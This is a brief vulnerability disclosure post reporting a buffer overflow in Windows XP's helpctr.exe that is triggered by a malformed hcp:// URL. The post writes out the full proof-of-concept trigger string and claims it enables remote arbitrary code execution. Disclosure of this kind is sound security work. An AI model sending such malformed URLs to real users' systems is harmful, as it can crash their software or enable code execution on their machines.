Hi, I don't know if this has been reported before. I discovered an exploitable buffer overflow vulnerability in "helpctr.exe", which can enable an attacker to execute an arbitrary code on remote users with a malformed url. Example : "hcp://m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m" Note : Dots are important do not remove them. I'm using Windows XP Pro Build 2600 Meliksah Ozoral mozoral@superonline.com
